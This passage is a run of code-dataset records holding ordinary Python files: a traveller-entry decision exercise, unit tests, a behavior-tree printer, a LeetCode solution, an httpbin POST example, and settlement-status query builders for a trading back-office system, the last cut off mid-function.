\"Reject\"\n else:\n return None\n\n\ndef decide(input_file, watchlist_file, countries_file):\n \"\"\"(json,json,json)->str\n Decides whether a traveller's entry into Kanadia should be accepted\n :param input_file: The name of a JSON formatted\n file that contains cases to decide\n :param watchlist_file: The name of a JSON formatted\n file that contains names and passport numbers on a watchlist\n :param countries_file: The name of a JSON formatted\n file that contains country data, such as whether\n an entry or transit visa is required, and whether\n there is currently a medical advisory\n :return: List of strings; Possible values of strings are:\n \"Accept\", \"Reject\", \"Secondary\", and \"Quarantine\"\n \"\"\"\n\n try:\n with open(input_file, \"r\") as entries:\n entries_content = entries.read()\n entries_content_list = json.loads(entries_content)\n entries.close()\n \n with open(watchlist_file,\"r\") as watchlist:\n watchlist_contents = watchlist.read()\n watchlist_contents_list = json.loads(watchlist_contents)\n watchlist.close()\n \n with open(countries_file, \"r\") as countries:\n countries_contents = countries.read()\n countries_contents_dic = json.loads(countries_contents)\n countries.close()\n except:\n raise FileNotFoundError\n #in case file not found\n else:\n decision_list = []\n for index in range(0, len(entries_content_list)):\n if medical_advisory(entries_content_list, countries_contents_dic, index)\\\n == \"Quarantine\":\n decision = \"Quarantine\"\n elif check_valid(entries_content_list,index) == \"Reject\":\n decision = \"Reject\"\n elif visit_visa(entries_content_list, countries_contents_dic, index)\\\n == \"Reject\":\n decision = \"Reject\"\n elif transit_visa(entries_content_list, countries_contents_dic, index)\\\n == \"Reject\":\n decision = \"Reject\"\n elif watch_list(entries_content_list, watchlist_contents_list, index)\\\n == \"Secondary\":\n decision = \"Secondary\"\n elif returning_residents(entries_content_list, index) == \"Accept\":\n decision = \"Accept\"\n else:\n decision = \"Accept\"\n decision_list.append(decision)\n return decision_list\n #decide according to quarantine,reject,secondary,accept priority sequence\n\n\ndef valid_passport_format(passport_number):\n \"\"\"(int)->Boolean\n Checks whether a passport number is five sets of\n five alpha-number characters separated by dashes\n :param passport_number: alpha-numeric string\n :return: Boolean; True if the format is valid, False otherwise\n \"\"\"\n passport_format = re.compile('.{5}-.{5}-.{5}-.{5}-.{5}')\n\n if passport_format.match(passport_number):\n return True\n else:\n return False\n\n\ndef valid_date_format(date_string):\n \"\"\"(int)->Boolean\n Checks whether a date has the format YYYY-mm-dd in numbers\n :param date_string: date to be checked\n :return: Boolean; True if the format is valid, False otherwise\n \"\"\"\n try:\n datetime.datetime.strptime(date_string, '%Y-%m-%d')\n return True\n except ValueError:\n return False","sub_path":"papers.py","file_name":"papers.py","file_ext":"py","file_size_in_byte":11390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"437627920","text":"import unittest\nfrom unittest.mock import patch, mock_open\n\n\nclass RobotCoreTest(unittest.TestCase):\n\n def test_open_file(self):\n with patch('builtins.open', mock_open(read_data='data')) as mock_file:\n assert open('/').read() == 'data'\n mock_file.assert_called_with('/')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"529306399","text":"from behaviortree.behavior import Behavior\nfrom behaviortree.composite import Composite\n\ndef dump_tree(tree: Composite, n: int = 1):\n is_composite = hasattr(tree, \"_children\")\n is_decorator = hasattr(tree, \"_child\")\n symbol = \">\"\n if is_composite: symbol = \"-\"\n if is_decorator: symbol = \"@\"\n item_name = tree._name\n item_type = tree.__class__.__name__\n if item_name == item_type: item_type = \"\"\n display = f\"|{symbol} {item_name}[{item_type}]\"\n print(\" \" * n + display)\n # dump children\n if is_composite:\n for child in tree._children:\n dump_tree(child, n + 1)\n if is_decorator:\n dump_tree(tree._child, n + 1)","sub_path":"src/behaviortree/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"309507364","text":"from typing import List\nfrom Leetcode.utils import perf\n\n\nclass Solution:\n # tc: O(N * L)\n # sc: O(N * L)\n @perf\n def removeComments(self, source: List[str]) -> List[str]:\n in_block = False\n newline = []\n ans = []\n\n for line in source:\n i = 0\n\n while i < len(line):\n token = line[i : i+2]\n\n if in_block:\n if token == '*/':\n in_block = False\n i += 1 # bump it 1 so it moves 2 spaces and skips the forward-slash\n else:\n if token == '/*':\n in_block = True\n i += 1 # bump it 1 so it moves 2 spaces and skips the asterisk\n elif token == '//':\n break\n else:\n char = line[i]\n newline.append(char)\n\n i += 1\n\n # if in block then keep same array to concatenate code from previous lines before block comment started\n if not in_block:\n # Add newline only if not in block. Otherwise, duplicates will be added\n if newline:\n ln = ''.join(newline)\n ans.append(ln)\n newline.clear()\n\n return ans\n","sub_path":"Leetcode/remove_comments/solution_imp.py","file_name":"solution_imp.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"354743741","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Terry'\n\nimport requests\n\nheaders = {\n 'User-Agent': r'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '\n r'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',\n 'Referer': r'http://httpbin.org',\n 'Connection': 'keep-alive'\n}\ndata = {\n 'key1': 'value1',\n 'key2': 'value2'\n}\nurl = 'http://httpbin.org/post'\nr = requests.post(url, data=data, headers=headers, proxies={'http': '127.0.0.1:8888'})\nprint(r.text)\n\n","sub_path":"docs/s1106/requests_post_test.py","file_name":"requests_post_test.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14950856","text":"# Copyright 2021 The Brax Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Composer tests.\"\"\"\n\nimport collections\nimport functools\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nfrom brax.experimental.composer import composer\nfrom brax.experimental.composer import observers\nfrom jax import numpy as jnp\n\n\nclass ComposerTest(parameterized.TestCase):\n \"\"\"Tests for Composer module.\"\"\"\n\n @parameterized.parameters('ant_push', 'ant_chase')\n def testEnvCreation(self, env_name):\n composer.create(env_name=env_name)\n\n def testObservationConcatSplit(self):\n leading_dims = (5, 4)\n obs_shapes = ((3, 4), (12,), (2, 2))\n obs_sizes = [\n functools.reduce(lambda x, y: x * y, shape) for shape in obs_shapes\n ]\n obs_vec_size = sum(obs_sizes)\n obs_dict = collections.OrderedDict([(i, jnp.zeros(leading_dims + shape))\n for i, shape in enumerate(obs_shapes)])\n # get observer_shapes\n obs_shapes_from_data = observers.get_obs_dict_shape(\n obs_dict, batch_shape=leading_dims)\n for s1, s2 in zip(obs_shapes, obs_shapes_from_data.values()):\n s2 = s2['shape']\n self.assertEqual(s1, s2, f'{s1} != {s2}')\n\n # concat\n obs = composer.concat_obs(obs_dict, obs_shapes_from_data)\n self.assertEqual(obs.shape, leading_dims + (obs_vec_size,),\n f'{obs.shape} != {leading_dims} + ({obs_vec_size},)')\n\n # split again\n obs_dict_2 = composer.split_obs(obs, obs_shapes_from_data)\n for s1, s2 in zip(obs_dict_2.values(), obs_shapes_from_data.values()):\n s1 = s1.shape\n s2 = s2['shape']\n self.assertEqual(s1, leading_dims + s2, f'{s1} != {leading_dims} + {s2}')\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"brax/experimental/composer/tests/composer_test.py","file_name":"composer_test.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"441399183","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/settlement/etc/FSettlementStatusQueries.py\"\nimport acm\nimport FOperationsUtils as Utils\nfrom FOperationsDateUtils import GetAccountingCurrencyCalendar, AdjustDateToday\n\n\nfrom FSettlementEnums import RelationType, SettlementStatus, SettlementType\nfrom FOperationsEnums import TradeType, TradeStatus, InsType, SettleType\n\nCONST_UpdatedVoidRecalledStatusQuery = None\nCONST_UpdatedVoidStatusQuery = None\nCONST_PreReleasedStatusQuery = None\nCONST_PreReleasedStatusMaxDaysBackQuery = None\nCONST_ClosedStatusQuery = None\nCONST_ClosedRecalledStatusQuery = None\nCONST_PostReleasedStatusQuery = None\nCONST_CompensationPaymentQuery = None\nCONST_DefaultSettlementProcessQuery = None\nCONST_RecallStatusesQuery = None\nCONST_NetPartQuery = None\nCONST_NetParentsQuery = None\nCONST_DividendQuery = None\nCONST_CouponRedemptionQuery = None\nCONST_CouponQuery = None\nCONST_RedemptionQuery = None\nCONST_ApplicableForNettingQuery = None\nCONST_IsCancelledSettlementQuery = None\nCONST_IsClosingPayoutTradeQuery = None\nCONST_IsClosingTradeQuery = None\nCONST_IsNDFTradeQuery = None\nCONST_IsAdHocNetQuery = None\nCONST_CancelledSecuritiesQuery = None\nCONST_IsPostReleasedSettlementOrPartOfNetHierarchy = None\nCONST_IsVoidCancelCorrectChild = None\nCONST_IsCancelledSettlement = None\nCONST_PartialSettledQuery = None\nCONST_IsSecuritySettlementWithStatusReplaced = None\nCONST_IsSettledSecuritySettlementQuery = None\nCONST_PairOffHierarchyChildren = None\nCONST_PairOffPaymentsQuery = None\nCONST_PairOffChildrenQuery = None\nCONST_ValueDayAdjustedQuery = None\n\ndef GetUpdatedVoidRecalledStatusQuery():\n global CONST_UpdatedVoidRecalledStatusQuery\n if CONST_UpdatedVoidRecalledStatusQuery != None:\n return CONST_UpdatedVoidRecalledStatusQuery\n\n CONST_UpdatedVoidRecalledStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UPDATED))\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RECALLED))\n \n or2 = CONST_UpdatedVoidRecalledStatusQuery.AddOpNode('AND')\n or2.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n\n and1 = or2.AddOpNode('OR')\n and1.AddAttrNode('NumberOfChildren', 'EQUAL', 0)\n and1.AddAttrNode('Children.RelationType', 'NOT_EQUAL', RelationType.CANCEL_CORRECT)\n\n return CONST_UpdatedVoidRecalledStatusQuery\n\ndef GetUpdatedVoidStatusQuery():\n\n global CONST_UpdatedVoidStatusQuery\n if CONST_UpdatedVoidStatusQuery != None:\n return CONST_UpdatedVoidStatusQuery\n\n CONST_UpdatedVoidStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n or1 = CONST_UpdatedVoidStatusQuery.AddOpNode('OR')\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UPDATED))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or2 = CONST_UpdatedVoidStatusQuery.AddOpNode('AND')\n or2.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n\n return CONST_UpdatedVoidStatusQuery\n\ndef GetPreReleasedStatusQuery():\n\n global CONST_PreReleasedStatusQuery\n if CONST_PreReleasedStatusQuery != None:\n return CONST_PreReleasedStatusQuery\n\n CONST_PreReleasedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AWAITING_CANCELLATION))\n return CONST_PreReleasedStatusQuery\n\ndef GetPreReleasedStatusMaxDaysBackQuery():\n import FSettlementParameters as SettlementParameters\n global CONST_PreReleasedStatusMaxDaysBackQuery\n if CONST_PreReleasedStatusMaxDaysBackQuery != None:\n return CONST_PreReleasedStatusMaxDaysBackQuery\n\n calendar = GetAccountingCurrencyCalendar()\n startDate = AdjustDateToday(calendar, -SettlementParameters.maximumDaysBack)\n\n CONST_PreReleasedStatusMaxDaysBackQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PreReleasedStatusMaxDaysBackQuery.AddAttrNode('ValueDay', 'GREATER_EQUAL', startDate)\n orQuery = CONST_PreReleasedStatusMaxDaysBackQuery.AddOpNode('OR')\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n return CONST_PreReleasedStatusMaxDaysBackQuery\n\ndef GetClosedStatusQuery():\n global CONST_ClosedStatusQuery\n if CONST_ClosedStatusQuery != None:\n return CONST_ClosedStatusQuery\n CONST_ClosedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_ClosedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CLOSED))\n return CONST_ClosedStatusQuery\n\ndef GetClosedRecalledStatusQuery():\n global CONST_ClosedRecalledStatusQuery\n if CONST_ClosedRecalledStatusQuery != None:\n return CONST_ClosedRecalledStatusQuery\n\n CONST_ClosedRecalledStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_ClosedRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RECALLED))\n CONST_ClosedRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CLOSED))\n return CONST_ClosedRecalledStatusQuery\n\ndef GetPartialSettled():\n global CONST_PartialSettledQuery\n if CONST_PartialSettledQuery != None:\n return CONST_PartialSettledQuery\n CONST_PartialSettledQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PartialSettledQuery.AddAttrNode('PartialParent.Oid', 'NOT_EQUAL', 0)\n andQuery = CONST_PartialSettledQuery.AddOpNode('AND')\n andQuery.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n andQuery.AddAttrNode('Parent.PartialParent.Oid', 'NOT_EQUAL', 0)\n return CONST_PartialSettledQuery\n\ndef GetCancelledSecuritiesQuery():\n global CONST_CancelledSecuritiesQuery\n if CONST_CancelledSecuritiesQuery != None:\n return CONST_CancelledSecuritiesQuery\n CONST_CancelledSecuritiesQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_CancelledSecuritiesQuery.AddAttrNode('Parent.IsCancelledByUs', 'EQUAL', True)\n andNode = CONST_CancelledSecuritiesQuery.AddOpNode('AND')\n andNode.AddAttrNode('IsSecurity', 'EQUAL', True)\n andNode.AddAttrNode('IsCancelledByUs', 'EQUAL', True)\n return CONST_CancelledSecuritiesQuery\n\ndef GetPairOffHierarchyChildren():\n global CONST_PairOffHierarchyChildren\n if CONST_PairOffHierarchyChildren != None:\n return CONST_PairOffHierarchyChildren\n CONST_PairOffHierarchyChildren = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffHierarchyChildren.AddAttrNode('GetTopSettlementInHierarchy.NumberOfPairOffChildren', 'NOT_EQUAL', 0)\n return CONST_PairOffHierarchyChildren\n\ndef GetPairOffPaymentsQuery():\n global CONST_PairOffPaymentsQuery\n if CONST_PairOffPaymentsQuery != None:\n return CONST_PairOffPaymentsQuery\n CONST_PairOffPaymentsQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffPaymentsQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.PAIR_OFF_PAYMENT))\n return CONST_PairOffPaymentsQuery\n\ndef GetPairOffChildrenQuery():\n global CONST_PairOffChildrenQuery\n if CONST_PairOffChildrenQuery != None:\n return CONST_PairOffChildrenQuery\n CONST_PairOffChildrenQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffChildrenQuery.AddAttrNode('PairOffParent.Oid', 'NOT_EQUAL', 0)\n return CONST_PairOffChildrenQuery\n\ndef GetPostReleasedStatusQuery():\n global CONST_PostReleasedStatusQuery\n if CONST_PostReleasedStatusQuery != None:\n return CONST_PostReleasedStatusQuery\n CONST_PostReleasedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RELEASED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NOT_ACKNOWLEDGED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_CLOSURE))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NON_RECEIPT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.INCORRECT_RECEIPT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NON_PAYMENT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.INCORRECT_PAYMENT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UNEXPECTED_CREDIT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UNEXPECTED_DEBIT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.HOLD))\n #Hold not actually postreleased status but treated the same way. Maybe change in future\n return CONST_PostReleasedStatusQuery\n\ndef GetCompensationPaymentQuery():\n global CONST_CompensationPaymentQuery\n if CONST_CompensationPaymentQuery != None:\n return CONST_CompensationPaymentQuery\n CONST_CompensationPaymentQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_CompensationPaymentQuery.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COMPENSATION_PAYMENT))\n return CONST_CompensationPaymentQuery\n\ndef GetNetPartQuery():\n global CONST_NetPartQuery\n if CONST_NetPartQuery != None:\n return CONST_NetPartQuery\n CONST_NetPartQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.AD_HOC_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n return CONST_NetPartQuery\n\ndef GetNetParentsQuery():\n global CONST_NetParentsQuery\n if CONST_NetParentsQuery != None:\n return CONST_NetParentsQuery\n\n CONST_NetParentsQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n or2 = CONST_NetParentsQuery.AddOpNode('OR')\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or1 = CONST_NetParentsQuery.AddOpNode('OR')\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NOT_ACKNOWLEDGED))\n return CONST_NetParentsQuery\n\ndef GetDefaultSettlementProcessQuery():\n\n global CONST_DefaultSettlementProcessQuery\n if CONST_DefaultSettlementProcessQuery != None:\n return CONST_DefaultSettlementProcessQuery\n\n CONST_DefaultSettlementProcessQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_DefaultSettlementProcessQuery.AddAttrNode('Aggregate', 'EQUAL', 0)\n CONST_DefaultSettlementProcessQuery.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('TradeType', TradeType.CASH_POSTING))\n\n orQuery = CONST_DefaultSettlementProcessQuery.AddOpNode('OR')\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.FO_CONFIRMED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.BO_CONFIRMED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.BO_BO_CONFIRMED))\n return CONST_DefaultSettlementProcessQuery\n\ndef GetRecallStatusesQuery():\n global CONST_RecallStatusesQuery\n if CONST_RecallStatusesQuery != None:\n return CONST_RecallStatusesQuery\n CONST_RecallStatusesQuery = acm.CreateFASQLQuery(acm.FTrade, 'OR')\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.VOID))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.CONFIRMED_VOID))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.TERMINATED))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.SIMULATED))\n return CONST_RecallStatusesQuery\n\ndef GetDividendQuery():\n global CONST_DividendQuery\n if CONST_DividendQuery != None:\n return CONST_DividendQuery\n\n CONST_DividendQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_DividendQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.DIVIDEND))\n and1.AddAttrNode('SecurityInstrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.STOCK))\n and1.AddAttrNode('Trade.Instrument.InsType', 'NOT_EQUAL', Utils.GetEnum('InsType', InsType.TOTAL_RETURN_SWAP))\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n\n and4 = CONST_DividendQuery.AddOpNode('AND')\n\n orNetParentType = and4.AddOpNode('OR')\n andNetPartStatus = and4.AddOpNode('AND')\n\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n andNetPartStatus.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n return CONST_DividendQuery\n\ndef GetCouponRedemptionQuery():\n\n global CONST_CouponRedemptionQuery\n if CONST_CouponRedemptionQuery != None:\n return CONST_CouponRedemptionQuery\n CONST_CouponRedemptionQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_CouponRedemptionQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n or3 = and1.AddOpNode('OR')\n or3.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n or3.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n\n andNodeNetpart = CONST_CouponRedemptionQuery.AddOpNode('AND')\n orNetParentType = andNodeNetpart.AddOpNode('OR')\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n\n\n return CONST_CouponRedemptionQuery\n\ndef GetCouponQuery():\n\n global CONST_CouponQuery\n if CONST_CouponQuery != None:\n return CONST_CouponQuery\n CONST_CouponQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_CouponQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n\n andNodeNetpart = CONST_CouponQuery.AddOpNode('AND')\n andNodeNetpart.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n\n return CONST_CouponQuery\n\ndef GetRedemptionQuery():\n\n global CONST_RedemptionQuery\n if CONST_RedemptionQuery != None:\n return CONST_RedemptionQuery\n CONST_RedemptionQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_RedemptionQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n\n andNodeNetpart = CONST_RedemptionQuery.AddOpNode('AND')\n andNodeNetpart.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n\n return CONST_RedemptionQuery\n\n\ndef GetApplicableForNettingQuery(autoNetTypes = None):\n global CONST_ApplicableForNettingQuery\n if CONST_ApplicableForNettingQuery != None:\n return CONST_ApplicableForNettingQuery\n\n CONST_ApplicableForNettingQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_ApplicableForNettingQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n\n and1.AddAttrNode('Parent', 'EQUAL', None)\n 